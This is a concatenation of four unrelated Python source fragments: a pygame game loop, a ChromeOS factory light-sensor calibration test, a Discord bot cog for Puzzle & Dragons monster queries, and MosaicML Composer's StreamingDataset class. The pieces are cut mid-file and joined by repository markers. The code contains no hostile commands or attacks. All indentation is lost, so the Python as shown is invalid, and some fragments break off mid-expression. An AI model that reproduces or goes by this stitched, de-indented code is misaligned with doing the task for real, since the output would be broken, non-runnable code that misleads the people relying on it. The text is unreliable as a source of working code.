#drawText('And Enjoy', font, windowSurface, (WINDOWWIDTH / 3), (WINDOWHEIGHT / 3)+30)
#drawRect(windowSurface)
#pygame.display.update()
starttime = int(time.time())
endtime = int(starttime + GAMEDURATION)
#waitForPlayerToPressKey()
zero=0
if not os.path.exists("data/save.dat"):
f=open("data/save.dat",'w')
f.write(str(zero))
f.close()
v=open("data/save.dat",'r')
topScore = int(v.readline())
v.close()
pygame.mixer.music.play(-1, 0.0)
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)
doCounting(windowSurface, 5)
while (count>0):
# start of the game
baddies = []
stars = []
walls = []
score = 0
playerRect.topleft = ((WINDOWWIDTH - playerRect.width) / 2, WINDOWHEIGHT - playerRect.height)
moveLeft = moveRight = moveUp = moveDown = False
reverseCheat = slowCheat = False
baddieAddCounter = 0
starAddCounter = 0
while True: # the game loop
for event in pygame.event.get():
if event.type == QUIT:
terminate()
if event.type == KEYDOWN:
if event.key == ord('z'):
reverseCheat = True
if event.key == ord('x'):
slowCheat = True
if event.key == K_LEFT or event.key == ord('a'):
moveRight = False
moveLeft = True
if event.key == K_RIGHT or event.key == ord('d'):
moveLeft = False
moveRight = True
if event.key == K_UP or event.key == ord('w'):
moveDown = False
moveUp = True
if event.key == K_DOWN or | |
<reponame>arccode/factory
# Copyright 2017 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=line-too-long
"""Calibration test for light sensor (a chamber is needed).
Description
-----------
This is a station-based test which calibrates light sensors.
The test controls a light chamber to switch light intensity between different
light preset and reads the value from the light sensor of a DUT.
The calibration method is linear regression. The test samples multiple
data points (e.g., LUX1, LUX2) and find out a new linear equation to fit the
validating data point (e.g., LUX3). The calibrated coefficients scale factor and
bias will be saved to the VPD.
The default chamber connection driver is PL2303 over RS232. You can speicify a
new driver to ``chamber_conn_params``. You also need to provide the
``chamber_cmd`` with which a station can command the light chamber.
Besides the arguments, there are still many configurations in the
light_sensor_calibration.json. For examples:
{
"version": "v0.01",
"light_seq": ["LUX1", "LUX2", "LUX3"],
"n_samples": 5,
"read_delay": 2.0,
"light_delay": 6.0,
"luxs": [40, 217],
"validating_light": "LUX3",
"validating_lux": 316,
"validating_err_limit": 0.2,
"force_light_init": false
}
The most important entries are ``luxs`` and ``validating_lux``. They are the
preset illuminance value of a light chamber fixture. You need a lux meter
to evaluate the preset light settings from the light chamber fixture to get
these values. After you have these values, don't forget to update the runtime
configuration by calling
``cros.factory.utils.config_utils.SaveRuntimeConfig('light_sensor_calibration', new_config)``
so that you have the correct preset light information. There are many things
that influence the preset light value of the light chamber. It could be the
unstable elecrtic environment or if the light chamber's bulb is broken.
Test Procedure
--------------
This is an automated test. Before you start the test, prepare the
physical setup and calibrate the light chamber itself by a lux meter:
1. Connects the station and the DUT.
2. Connects the station and the light chamber.
3. Press start test.
4. After finishing the test, disconnects the station and the DUT.
Dependency
----------
- A light chamber with at least three luminance settings.
Examples
--------
To automatically calibrate the light_sensor with the given ``chamber_cmd``, add
this into test list::
{
"pytest_name": "light_sensor_calibration",
"args": {
"control_chamber": true,
"assume_chamber_connected": true,
"chamber_cmd": {
"LUX1": [
[
"LUX1_ON",
"LUX1_READY"
]
],
"LUX2": [
[
"LUX2_ON",
"LUX2_READY"
]
],
"LUX3": [
[
"LUX3_ON",
"LUX3_READY"
]
],
"OFF": [
[
"OFF",
"OFF_READY"
]
]
}
}
}
To debug and use a mocked light chamber::
{
"pytest_name": "light_sensor_calibration",
"args": {
"control_chamber": true,
"mock_mode": true
}
}
To manually switch chamber light::
{
"pytest_name": "light_sensor_calibration",
"args": {
"control_chamber": false
}
}
Trouble Shooting
----------------
If you found error related to load configuration file:
- This is probably your runtime config format is incorrect.
If you found error connecting to light chamber:
1. Make sure the chamber and station are connected.
2. Make sure the dongle is correct one. If you are not using the dongle with
PL2303 driver, you need to provide one.
If you found the calibrated coefficients are skewd:
1. This is probably you don't calibrate the light chamber recently.
"""
from collections import namedtuple
import json
import logging
import time
import numpy as np
from cros.factory.device import ambient_light_sensor
from cros.factory.device import device_utils
from cros.factory.test import session
from cros.factory.test.fixture import fixture_connection
from cros.factory.test.fixture.light_sensor import light_chamber
from cros.factory.test import i18n
from cros.factory.test.i18n import _
from cros.factory.test import test_case
from cros.factory.test.utils import kbd_leds
from cros.factory.test.utils import media_utils
from cros.factory.testlog import testlog
from cros.factory.utils.arg_utils import Arg
from cros.factory.utils import config_utils
from cros.factory.utils import type_utils
# LED pattern.
LED_PATTERN = ((kbd_leds.LED_NUM | kbd_leds.LED_CAP, 0.05), (0, 0.05))
# Data structures.
EventType = type_utils.Enum(['START_TEST', 'EXIT_TEST'])
FIXTURE_STATUS = type_utils.Enum(['CONNECTED', 'DISCONNECTED'])
InternalEvent = namedtuple('InternalEvent', 'event_type aux_data')
FAIL_CONFIG = 'ConfigError' # Config file error.
FAIL_SN = 'SerialNumber' # Missing camera or bad serial number.
FAIL_CHAMBER_ERROR = 'ChamberError' # Chamber connection error.
FAIL_ALS_NOT_FOUND = 'AlsNotFound' # ALS not found.
FAIL_ALS_CLEAN = 'AlsClean' # ALS coefficient clean up error.
FAIL_ALS_SAMPLE = 'AlsSample' # ALS sampling error.
FAIL_ALS_ORDER = 'AlsOrder' # ALS order error.
FAIL_ALS_CALIB = 'AlsCalibration' # ALS calibration error.
FAIL_ALS_CALC = 'AlsCalculation' # ALS coefficient calculation error.
FAIL_ALS_VALID = 'AlsValidating' # ALS validating error.
FAIL_ALS_VPD = 'AlsVPD' # ALS write VPD error
FAIL_ALS_CONTROLLER = 'ALSController' # ALS controller error.
FAIL_UNKNOWN = 'UnknownError' # Unknown error
# ALS mock mode.
ALS_MOCK_VALUE = 10
# Chamber connection parameters
CHAMBER_CONN_PARAMS_DEFAULT = {
'driver': 'pl2303',
'serial_delay': 0,
'serial_params': {
'baudrate': 9600,
'bytesize': 8,
'parity': 'N',
'stopbits': 1,
'xonxoff': False,
'rtscts': False,
'timeout': None
},
'response_delay': 2
}
class ALSFixture(test_case.TestCase):
"""ALS fixture main class."""
ARGS = [
# chamber connection
Arg('control_chamber', bool, 'Whether or not to control the chart in the '
'light chamber.', default=False),
Arg('assume_chamber_connected', bool, 'Assume chamber is connected on '
'test startup. This is useful when running fixture-based testing. '
"The OP won't have to reconnect the fixture everytime.",
default=True),
Arg('chamber_conn_params', (dict, str), 'Chamber connection parameters, '
"either a dict, defaults to None", default=None),
Arg('chamber_cmd', dict, 'A dict for name of lightning to a '
'[cmd, cmd_response].'),
Arg('chamber_n_retries', int, 'Number of retries when connecting.',
default=10),
Arg('chamber_retry_delay', int, 'Delay between connection retries.',
default=2),
# test environment
Arg('mock_mode', bool, 'Mock mode allows testing without a fixture.',
default=False),
Arg('config_dict', dict, 'The config dictionary. '
'If None, then the config is loaded by config_utils.LoadConfig().',
default=None),
Arg('keep_raw_logs', bool,
'Whether to attach the log by Testlog',
default=True),
]
def setUp(self):
self.dut = device_utils.CreateDUTInterface()
try:
self.als_controller = self.dut.ambient_light_sensor.GetController()
except Exception as e:
self._LogFailure(FAIL_ALS_NOT_FOUND,
'Error getting ALS controller: %s' % str(e))
raise
# Loads config.
try:
self.config = self.args.config_dict or config_utils.LoadConfig()
if self.config is None:
raise ValueError('No available configuration.')
self._LogConfig()
except Exception as e:
logging.exception('Error logging config file: %s', str(e))
raise
self.read_delay = self.config['read_delay']
self.n_samples = self.config['n_samples']
try:
if self.args.chamber_conn_params is None:
chamber_conn_params = CHAMBER_CONN_PARAMS_DEFAULT
else:
chamber_conn_params = self.args.chamber_conn_params
self.fixture_conn = None
if self.args.control_chamber:
if self.args.mock_mode:
script = {k.strip(): v.strip()
for k, v in sum(self.args.chamber_cmd.values(), [])}
self.fixture_conn = fixture_connection.MockFixtureConnection(script)
else:
self.fixture_conn = fixture_connection.SerialFixtureConnection(
**chamber_conn_params)
self.chamber = light_chamber.LightChamber(
fixture_conn=self.fixture_conn, fixture_cmd=self.args.chamber_cmd)
except Exception as e:
self._LogFailure(FAIL_CHAMBER_ERROR,
'Error setting up ALS chamber: %s' % str(e))
self.all_sampled_lux = [] # mean of sampled lux for each light
self.scale_factor = None # value of calibrated scale factor
self.bias = None # value of calibrated bias
self.light_index = -1 # ALS test stage
self.monitor = media_utils.MediaMonitor('usb-serial', None)
self.ui.SetTitle(_('ALS Sensor Calibration'))
# Group checker for Testlog.
self.group_checker = testlog.GroupParam(
'lux_value', ['name', 'value', 'elapsed'])
def _Log(self, text):
"""Custom log function to log."""
logging.info(text)
session.console.info(text)
def _LogArgument(self, key, value, description):
testlog.AddArgument(key, value, description)
self._Log("%s=%s" % (key, value))
def _LogConfig(self):
if self.args.keep_raw_logs:
testlog.AttachContent(
content=json.dumps(self.config),
name='light_sensor_calibration_config.json',
description='json of light sensor calibration config')
def _LogFailure(self, code, details):
testlog.AddFailure(code, details)
message = 'FAIL %r: %r' % (code, details)
logging.exception(message)
session.console.info(message)
def _ALSTest(self):
try:
self._ShowTestStatus(_('Cleaning up calibration values'))
if not self.args.mock_mode:
self.als_controller.CleanUpCalibrationValues()
except Exception as e:
self._LogFailure(FAIL_ALS_CLEAN, 'Error cleaning up calibration values:'
' %s' % str(e))
raise
while True:
try:
if not self._SwitchToNextLight():
break
light_name = self.config['light_seq'][self.light_index]
self._ShowTestStatus(
i18n.StringFormat(_('Sampling {name}'), name=light_name))
self._SampleALS(light_name)
except Exception as e:
self._LogFailure(FAIL_ALS_SAMPLE, 'Error sampling lighting %d %s: %s' %
(self.light_index, light_name, str(e)))
raise
try:
self._ShowTestStatus(_('Checking ALS ordering'))
self._CheckALSOrdering()
except Exception as e:
self._LogFailure(FAIL_ALS_ORDER,
'Error checking als ordering: %s' % str(e))
raise
try:
self._ShowTestStatus(_('Calculating calibration coefficients'))
self._CalculateCalibCoef()
except Exception as e:
self._LogFailure(FAIL_ALS_CALC, 'Error calculating calibration'
' coefficient: %s' % str(e))
raise
try:
self._ShowTestStatus(_('Saving calibration coefficients to VPD'))
self._SaveCalibCoefToVPD()
except Exception as e:
self._LogFailure(FAIL_ALS_VPD, 'Error setting calibration'
' coefficient to VPD: %s' % str(e))
raise
try:
self._ShowTestStatus(_('Validating ALS'))
light_name = self.config['validating_light']
self._SwitchLight(light_name)
self._ValidateALS(light_name)
except Exception as e:
self._LogFailure(FAIL_ALS_VALID,
'Error validating calibrated ALS: %s' % str(e))
raise
def _OnU2SInsertion(self, device):
del device # unused
cnt = 0
while cnt < self.args.chamber_n_retries:
try:
self._SetupFixture()
self._SetFixtureStatus(FIXTURE_STATUS.CONNECTED)
return
except Exception:
cnt += 1
self._SetFixtureStatus(FIXTURE_STATUS.DISCONNECTED)
self.Sleep(self.args.chamber_retry_delay)
raise light_chamber.LightChamberError('Error connecting to light chamber')
def _OnU2SRemoval(self, device):
del device # unused
self._SetFixtureStatus(FIXTURE_STATUS.DISCONNECTED)
def _SetFixtureStatus(self, status):
if status == FIXTURE_STATUS.CONNECTED:
style = 'color-good'
label = _('Fixture Connected')
elif status == FIXTURE_STATUS.DISCONNECTED:
style = 'color-bad'
label = _('Fixture Disconnected')
else:
raise ValueError('Unknown fixture status %s' % status)
self.ui.SetHTML(
['<span class="%s">' % style, label, '</span>'], id='fixture-status')
def _SetupFixture(self):
"""Initialize the communication with the fixture."""
try:
self.chamber.Connect()
except Exception as e:
self._LogFailure(FAIL_CHAMBER_ERROR, 'Error initializing the ALS fixture:'
' %s' % str(e))
raise
self._Log('Test fixture successfully initialized.')
def _SwitchLight(self, light):
self._Log("Switching to lighting %s." % light)
self._ShowTestStatus(
i18n.StringFormat(_('Switching to lighting {name}'), name=light))
try:
self.chamber.SetLight(light)
| |
emoji_servers = settings.emojiServers()
await ctx.send(box("\n".join(str(s) for s in emoji_servers)))
@padinfo.command()
@checks.is_owner()
async def setvoicepath(self, ctx, *, path=''):
"""Set path to the voice direcory"""
settings.setVoiceDir(path)
await ctx.tick()
def get_emojis(self):
server_ids = [int(sid) for sid in settings.emojiServers()]
return [e for g in self.bot.guilds if g.id in server_ids for e in g.emojis]
@staticmethod
async def send_id_failure_message(ctx, query: str):
await ctx.send("Sorry, your query {0} didn't match any results :(\n"
"See <{2}> for "
"documentation on `{1.prefix}id`! You can also run `{1.prefix}idhelp <monster id>` to get "
"help with querying a specific monster.".format(inline(query), ctx, IDGUIDE))
@commands.command(aliases=["iddebug", "dbid", "iddb"])
async def debugid(self, ctx, server: Optional[Server] = Server.COMBINED, *, query):
"""Get helpful id information about a monster"""
dgcog = await self.get_dgcog()
mon = await dgcog.find_monster(query, ctx.author.id)
if mon is None:
await ctx.send(box("Your query didn't match any monsters."))
return
base_monster = dgcog.database.graph.get_base_monster(mon)
mods = dgcog.indexes[server].modifiers[mon]
manual_modifiers = dgcog.indexes[server].manual_prefixes[mon.monster_id]
EVOANDTYPE = dgcog.token_maps.EVO_TOKENS.union(dgcog.token_maps.TYPE_TOKENS)
ret = (f"[{mon.monster_id}] {mon.name_en}\n"
f"Base: [{base_monster.monster_id}] {base_monster.name_en}\n"
f"Series: {mon.series.name_en} ({mon.series_id}, {mon.series.series_type})\n\n"
f"[Name Tokens] {' '.join(sorted(t for t, ms in dgcog.indexes[server].name_tokens.items() if mon in ms))}\n"
f"[Fluff Tokens] {' '.join(sorted(t for t, ms in dgcog.indexes[server].fluff_tokens.items() if mon in ms))}\n\n"
f"[Manual Tokens]\n"
f" Treenames: {' '.join(sorted(t for t, ms in dgcog.indexes[server].manual_tree.items() if mon in ms))}\n"
f" Nicknames: {' '.join(sorted(t for t, ms in dgcog.indexes[server].manual_nick.items() if mon in ms))}\n\n"
f"[Modifier Tokens]\n"
f" Attribute: {' '.join(sorted(t for t in mods if t in dgcog.token_maps.COLOR_TOKENS))}\n"
f" Awakening: {' '.join(sorted(t for t in mods if t in dgcog.token_maps.AWAKENING_TOKENS))}\n"
f" Evo & Type: {' '.join(sorted(t for t in mods if t in EVOANDTYPE))}\n"
f" Other: {' '.join(sorted(t for t in mods if t not in dgcog.token_maps.OTHER_HIDDEN_TOKENS))}\n"
f"Manually Added: {' '.join(sorted(manual_modifiers))}\n")
for page in pagify(ret):
await ctx.send(box(page))
@commands.command()
async def debugiddist(self, ctx, s1, s2):
"""Find the distance between two queries.
For name tokens, the full word goes second as name token matching is not commutitive
"""
dgcog = await self.get_dgcog()
dist = dgcog.mon_finder.calc_ratio_modifier(s1, s2)
dist2 = dgcog.mon_finder.calc_ratio_name(s1, s2)
yes = '\N{WHITE HEAVY CHECK MARK}'
no = '\N{CROSS MARK}'
await ctx.send(f"Printing info for {inline(s1)}, {inline(s2)}\n" +
box(f"Jaro-Winkler Distance: {round(dist, 4)}\n"
f"Name Matching Distance: {round(dist2, 4)}\n"
f"Modifier token threshold: {dgcog.mon_finder.MODIFIER_JW_DISTANCE} "
f"{yes if dist >= dgcog.mon_finder.MODIFIER_JW_DISTANCE else no}\n"
f"Name token threshold: {dgcog.mon_finder.TOKEN_JW_DISTANCE} "
f"{yes if dist2 >= dgcog.mon_finder.TOKEN_JW_DISTANCE else no}"))
@commands.command(aliases=['helpid'])
async def idhelp(self, ctx, *, query=""):
"""Get help with an id query"""
await ctx.send(
"See <{0}> for documentation on `{1.prefix}id`!"
" Use `{1.prefix}idmeaning` to query the meaning of any modifier token."
" Remember that other than `equip`, modifiers must be at the start of the query."
"".format(IDGUIDE, ctx))
if query:
await self.debugid(ctx, query=query)
@commands.command()
async def exportmodifiers(self, ctx, server: LiteralConverter["COMBINED", "NA"] = "COMBINED"):
server = Server(server)
DGCOG = await self.get_dgcog()
maps = DGCOG.token_maps
awakenings = {a.awoken_skill_id: a for a in DGCOG.database.get_all_awoken_skills()}
series = {s.series_id: s for s in DGCOG.database.get_all_series()}
ret = ("Jump to:\n\n"
"* [Types](#types)\n"
"* [Evolutions](#evolutions)\n"
"* [Misc](#misc)\n"
"* [Awakenings](#awakenings)\n"
"* [Series](#series)\n"
"* [Attributes](#attributes)\n\n\n\n")
etable = [(k.value, ", ".join(map(inline, v))) for k, v in maps.EVO_MAP.items()]
ret += "\n\n### Evolutions\n\n" + tabulate(etable, headers=["Meaning", "Tokens"], tablefmt="github")
ttable = [(k.name, ", ".join(map(inline, v))) for k, v in maps.TYPE_MAP.items()]
ret += "\n\n### Types\n\n" + tabulate(ttable, headers=["Meaning", "Tokens"], tablefmt="github")
mtable = [(k.value, ", ".join(map(inline, v))) for k, v in maps.MISC_MAP.items()]
ret += "\n\n### Misc\n\n" + tabulate(mtable, headers=["Meaning", "Tokens"], tablefmt="github")
atable = [(awakenings[k.value].name_en, ", ".join(map(inline, v))) for k, v in maps.AWOKEN_SKILL_MAP.items()]
ret += "\n\n### Awakenings\n\n" + tabulate(atable, headers=["Meaning", "Tokens"], tablefmt="github")
stable = [(series[k].name_en, ", ".join(map(inline, v)))
for k, v in DGCOG.indexes[server].series_id_to_pantheon_nickname.items()]
ret += "\n\n### Series\n\n" + tabulate(stable, headers=["Meaning", "Tokens"], tablefmt="github")
ctable = [(k.name.replace("Nil", "None"), ", ".join(map(inline, v))) for k, v in maps.COLOR_MAP.items()]
ctable += [("Sub " + k.name.replace("Nil", "None"), ", ".join(map(inline, v))) for k, v in
maps.SUB_COLOR_MAP.items()]
for k, v in maps.DUAL_COLOR_MAP.items():
k0name = k[0].name.replace("Nil", "None")
k1name = k[1].name.replace("Nil", "None")
ctable.append((k0name + "/" + k1name, ", ".join(map(inline, v))))
ret += "### Attributes\n\n" + tabulate(ctable, headers=["Meaning", "Tokens"], tablefmt="github")
await ctx.send(file=text_to_file(ret, filename="table.md"))
@commands.command(aliases=["idcheckmod", "lookupmod", "idlookupmod", "luid", "idlu"])
async def idmeaning(self, ctx, token, server: Optional[Server] = Server.COMBINED):
"""Get all the meanings of a token (bold signifies base of a tree)"""
token = token.replace(" ", "")
DGCOG = await self.get_dgcog()
tms = DGCOG.token_maps
awokengroup = "(" + "|".join(re.escape(aw) for aws in tms.AWOKEN_SKILL_MAP.values() for aw in aws) + ")"
awakenings = {a.awoken_skill_id: a for a in DGCOG.database.get_all_awoken_skills()}
series = {s.series_id: s for s in DGCOG.database.get_all_series()}
ret = ""
def write_name_token(token_dict, token_type, is_multiword=False):
def f(m, s):
return bold(s) if DGCOG.database.graph.monster_is_base(m) else s
token_ret = ""
so = []
for mon in sorted(token_dict[token], key=lambda m: m.monster_id):
if (mon in DGCOG.indexes[server].mwtoken_creators[token]) == is_multiword:
so.append(mon)
if len(so) > 5:
token_ret += f"\n\n{token_type}\n" + ", ".join(f(m, str(m.monster_id)) for m in so[:10])
token_ret += f"... ({len(so)} total)" if len(so) > 10 else ""
elif so:
token_ret += f"\n\n{token_type}\n" + "\n".join(
f(m, f"{str(m.monster_id).rjust(4)}. {m.name_en}") for m in so)
return token_ret
ret += write_name_token(DGCOG.indexes[server].manual, "\N{LARGE PURPLE CIRCLE} [Multi-Word Tokens]", True)
ret += write_name_token(DGCOG.indexes[server].manual, "[Manual Tokens]")
ret += write_name_token(DGCOG.indexes[server].name_tokens, "[Name Tokens]")
ret += write_name_token(DGCOG.indexes[server].fluff_tokens, "[Fluff Tokens]")
submwtokens = [t for t in DGCOG.indexes[server].multi_word_tokens if token in t]
if submwtokens:
ret += "\n\n[Multi-word Super-tokens]\n"
for t in submwtokens:
if not DGCOG.indexes[server].all_name_tokens[''.join(t)]:
continue
creators = sorted(DGCOG.indexes[server].mwtoken_creators["".join(t)], key=lambda m: m.monster_id)
ret += f"{' '.join(t).title()}"
ret += f" ({', '.join(f'{m.monster_id}' for m in creators)})" if creators else ''
ret += (" ( \u2014> " +
str(DGCOG.mon_finder.get_most_eligable_monster(
DGCOG.indexes[server].all_name_tokens[''.join(t)]).monster_id)
+ ")\n")
def additmods(ms, om):
if len(ms) == 1:
return ""
return "\n\tAlternate names: " + ', '.join(inline(m) for m in ms if m != om)
meanings = '\n'.join([
*["Evo: " + k.value + additmods(v, token)
for k, v in tms.EVO_MAP.items() if token in v],
*["Type: " + get_type_emoji(k) + ' ' + k.name + additmods(v, token)
for k, v in tms.TYPE_MAP.items() if token in v],
*["Misc: " + k.value + additmods(v, token)
for k, v in tms.MISC_MAP.items() if token in v],
*["Awakening: " + get_awakening_emoji(k) + ' ' + awakenings[k.value].name_en + additmods(v, token)
for k, v in tms.AWOKEN_SKILL_MAP.items() if token in v],
*["Main attr: " + get_attribute_emoji_by_enum(k, None) + ' ' + k.name.replace("Nil", "None") +
additmods(v, token)
for k, v in tms.COLOR_MAP.items() if token in v],
*["Sub attr: " + get_attribute_emoji_by_enum(False, k) + ' ' + k.name.replace("Nil", "None") +
additmods(v, token)
for k, v in tms.SUB_COLOR_MAP.items() if token in v],
*["Dual attr: " + get_attribute_emoji_by_enum(k[0], k[1]) + ' ' + k[0].name.replace("Nil", "None") +
'/' + k[1].name.replace("Nil", "None") + additmods(v, token)
for k, v in tms.DUAL_COLOR_MAP.items() if token in v],
*["Series: " + series[k].name_en + additmods(v, token)
for k, v in DGCOG.indexes[server].series_id_to_pantheon_nickname.items() if token in v],
*["Rarity: " + m for m in re.findall(r"^(\d+)\*$", token)],
*["Base rarity: " + m for m in re.findall(r"^(\d+)\*b$", token)],
*[f"[UNSUPPORTED] Multiple awakenings: {m}x {awakenings[a.value].name_en}"
f"{additmods([f'{m}*{d}' for d in v], token)}"
for m, ag in re.findall(r"^(\d+)\*{}$".format(awokengroup), token)
for a, v in tms.AWOKEN_SKILL_MAP.items() if ag in v]
])
if meanings or ret:
for page in pagify(meanings + "\n\n" + ret.strip()):
await ctx.send(page)
else:
await ctx.send(f"There are no modifiers that match `{token}`.")
@commands.command(aliases=["tracebackid", "tbid", "idtb"])
async def idtraceback(self, ctx, *, query):
"""Get the traceback of an id query"""
selected_monster_id = None
if "/" in query:
query, selected_monster_id = query.split("/", 1)
if not selected_monster_id.strip().isdigit():
await ctx.send("Monster id must be an int.")
return
selected_monster_id = int(selected_monster_id.strip())
dgcog = await self.get_dgcog()
bestmatch, matches, _, _ = await dgcog.mon_finder.find_monster_debug(query)
if bestmatch is None:
await ctx.send("No monster matched.")
return
if selected_monster_id is not None:
selected = {m for m in matches if m.monster_id == selected_monster_id}
if not selected:
await ctx.send("The requested monster was not found as a result of the query.")
return
monster = selected.pop()
else:
monster = bestmatch
score = matches[monster].score
ntokens = matches[monster].name
mtokens = matches[monster].mod
lower_prio = {m for m in matches if matches[m].score == matches[monster].score}.difference({monster})
if len(lower_prio) > 20:
lpstr = f"{len(lower_prio)} other monsters."
else:
lpstr = "\n".join(f"{get_attribute_emoji_by_monster(m)} {m.name_en} ({m.monster_id})" for m in lower_prio)
mtokenstr = '\n'.join(f"{inline(t[0])}{(': ' + t[1]) if t[0] != t[1] else ''}"
f" ({round(dgcog.mon_finder.calc_ratio_modifier(t[0], t[1]), 2) if | |
<gh_stars>0
# Copyright 2022 MosaicML Composer authors
# SPDX-License-Identifier: Apache-2.0
"""The :class:`StreamingDataset` class, used for building streaming iterable datasets.
"""
import math
import os
from threading import Lock, Thread
from time import sleep
from typing import Any, Callable, Dict, Iterator, Optional
import numpy as np
from torch.utils.data import IterableDataset
from composer.datasets.streaming.download import download_or_wait
from composer.datasets.streaming.format import (StreamingDatasetIndex, bytes_to_sample_dict, get_index_basename,
get_shard_basename)
from composer.datasets.streaming.world import get_world
from composer.utils import dist
__all__ = ['StreamingDataset']
class StreamingDataset(IterableDataset):
"""A sharded, streaming, iterable dataset.
:class:`StreamingDataset` reads samples from binary `.mds` files that were written out by :class:`StreamingDatasetWriter`.
It currently supports downloading data from etiher S3 paths or local filepaths.
It supports multi-gpu + multi-node training, and has smart local cacheing to minimize network bandwidth.
It also provides best-effort shuffling to preserve randomness when ``shuffle=True``.
Args:
remote (str): Download shards from this remote S3 path or directory.
local (str): Download shards to this local directory for for caching.
shuffle (bool): Whether to shuffle the samples. Note that if `shuffle=False`, the sample order is deterministic but dependent on the DataLoader's `num_workers`.
decoders (Dict[str, Callable[bytes, Any]]]): For each sample field you wish to read, you must provide a decoder to convert the raw bytes to an object.
max_retries (int): Number of download re-attempts before giving up. Default: 2.
timeout (float): How long to wait for shard to download before raising an exception. Default: 60 sec.
batch_size (Optional[int]): Hint the batch_size that will be used on each device's DataLoader. Default: ``None``.
Worker indices will be constructed so that there is at most 1 incomplete batch at the end of each epoch.
E.g. if the DataLoader is reading over (samples=[0, 1, 2, 3, 4, 5, 6, 7], num_workers=3, batch_size=2, drop_last=True)
but `batch_size` is not hinted to the StreamingDataset ahead of time
then the samples will by default be assigned like: w0: [0, 1, 2], w1: [3, 4, 5], w2: [6, 7]
and will be read as batches: [0, 1], [3, 4], [6, 7] (with batches [2] and [5] dropped as incomplete)
but this is suboptimal because we could have dropped no samples.
So when `batch_size` is provided as a hint, we assign samples like this: w0: [0, 1, 2, 3], w1: [4, 5], w2: [6, 7]
which will be read as batches: [0, 1], [4, 5], [6, 7], [2, 3]
.. doctest::
To write the dataset:
>>> from composer.datasets.streaming import StreamingDatasetWriter
>>> samples = [
... {
... "uid": f"{ix:06}".encode("utf-8"),
... "data": (3 * ix).to_bytes(4, "big"),
... "unused": "blah".encode("utf-8"),
... }
... for ix in range(100)
... ]
>>> dirname = "remote"
>>> fields = ["uid", "data"]
>>> with StreamingDatasetWriter(dirname=dirname, fields=fields) as writer:
... writer.write_samples(samples=samples)
To read the dataset:
>>> from composer.datasets.streaming import StreamingDataset
>>> remote = "remote"
>>> local = "local"
>>> decoders = {
... "uid": lambda uid_bytes: uid_bytes.decode("utf-8"),
... "data": lambda data_bytes: int.from_bytes(data_bytes, "big"),
... }
>>> dataset = StreamingDataset(remote=remote, local=local, shuffle=False, decoders=decoders)
"""
def __init__(self,
remote: str,
local: str,
shuffle: bool,
decoders: Dict[str, Callable[[bytes], Any]],
max_retries: int = 2,
timeout: float = 60,
batch_size: Optional[int] = None) -> None:
self.remote = remote
self.local = local
self.shuffle = shuffle
self.decoders = decoders
self.max_retries = max_retries
self.timeout = timeout
self.batch_size = batch_size
# Load the index file containing the shard metadata
# This file contains the shard and offset in bytes of each sample (for direct access).
# Only local device 0 on each node downloads the index. All other devices wait.
index_basename = get_index_basename()
index_local = self._download_file(index_basename, wait=(dist.get_local_rank() != 0))
with open(index_local, 'rb') as fp:
self.index = StreamingDatasetIndex.load(fp)
# Fields, protected by the lock, relating to loading shards in the background.
self._lock: Lock
self._next_epoch = 0
self._epoch_to_todo_ids = {}
self._downloaded_ids = []
self._is_downloaded = False
def _download_file(self, basename: str, wait=False) -> str:
"""Safely download a file from remote to local cache.
Args:
basename (str): Basename of file to download.
wait (bool): Whether to wait for another worker to download the file.
Returns:
str: Local cache filename.
"""
remote = os.path.join(self.remote, basename)
local = os.path.join(self.local, basename)
download_or_wait(remote=remote, local=local, wait=wait, max_retries=self.max_retries, timeout=self.timeout)
return local
def _insert_shard_samples(self, shard: int, part_min_id: int, part_max_id: int) -> None:
"""Load the given locally cached shard into the dataset.
Every time you call __iter__ on this dataset, it registers the list of
samples you have left, which will not be the full epoch if the dataset
isn't finished loaded when you start training.
Calls to _insert_shard_samples during training modify the samples remaining on
these iterations on the fly to insert these new samples and then re-sort,
making the shuffle as perfect as was possible.
This operation takes the lock, so batch your _insert_shard_samples calls where
possible.
Args:
shard (int): Shard to load.
part_min_id (int): Minimum sample ID of this partition.
part_max_id (int): Maximum sample ID of this partition.
"""
# Get all samples from the given shards that fall within our partition.
shard_min_id = self.index.shard_begins[shard]
shard_max_id = self.index.shard_ends[shard] - 1
min_id = max(part_min_id, shard_min_id)
max_id = min(part_max_id, shard_max_id)
new_ids = list(range(min_id, max_id + 1))
with self._lock:
# Extend and optionally reshuffle the remaining samples of any
# epochs we have in progress.
if self.shuffle:
if not self._is_downloaded:
self._downloaded_ids.extend(new_ids)
np.random.shuffle(self._downloaded_ids)
for todo_ids in self._epoch_to_todo_ids.values():
todo_ids.extend(new_ids)
np.random.shuffle(todo_ids)
else:
if not self._is_downloaded:
self._downloaded_ids.extend(new_ids)
for todo_ids in self._epoch_to_todo_ids.values():
todo_ids.extend(new_ids)
def download(self) -> None:
"""Download and assimilate missing shards."""
if not hasattr(self, '_lock'):
self._lock = Lock()
with self._lock:
if self._is_downloaded:
return
# We find out num workers, and therefore num partitions, when __iter__ is called.
# From the partition, derive our shard overlap range and exact sample range.
world = get_world()
part_shards, part_shards_to_download, part_min_id, part_max_id = self.index.get_partition(
world, self.batch_size)
if self.shuffle:
# Always process first shard first because other workers may be waiting on it
part_shards = np.array(part_shards)
np.random.shuffle(part_shards[1:])
for shard in part_shards:
# If this worker is in charge of downloading the shard, download it.
# Otherwise, wait until shard gets downloaded by another worker on this node
# This produces deterministic sample order.
basename = get_shard_basename(shard)
self._download_file(basename, wait=(shard not in part_shards_to_download))
self._insert_shard_samples(shard, part_min_id, part_max_id)
with self._lock:
self._is_downloaded = True
def __len__(self) -> int:
"""Get the length of the dataset.
Returns:
int: Dataset length.
"""
return math.ceil(self.index.total_samples / dist.get_world_size())
def _unpack_sample(self, data: bytes) -> Dict[str, Any]:
"""Unpack a sample dict from raw bytes.
First unpacks the str to raw bytes dict, then unpacks each field's raw bytes.
Args:
data (bytes): The packed bytes of the sample.
Returns:
Dict[str, Any]: The sample dict.
"""
key_to_raw = bytes_to_sample_dict(data, self.index.fields)
obj = {}
for key, decode in self.decoders.items():
raw_value = key_to_raw[key]
decoded_value = decode(raw_value)
obj[key] = decoded_value
return obj
def __getitem__(self, idx: int) -> Any:
"""Get the sample at the index, assuming its shard is loaded.
Do not call this directly unless the shard containing this idx has been loaded.
Will crash otherwise.
Args:
idx (int): Sample ID.
Returns:
Any: The sample.
"""
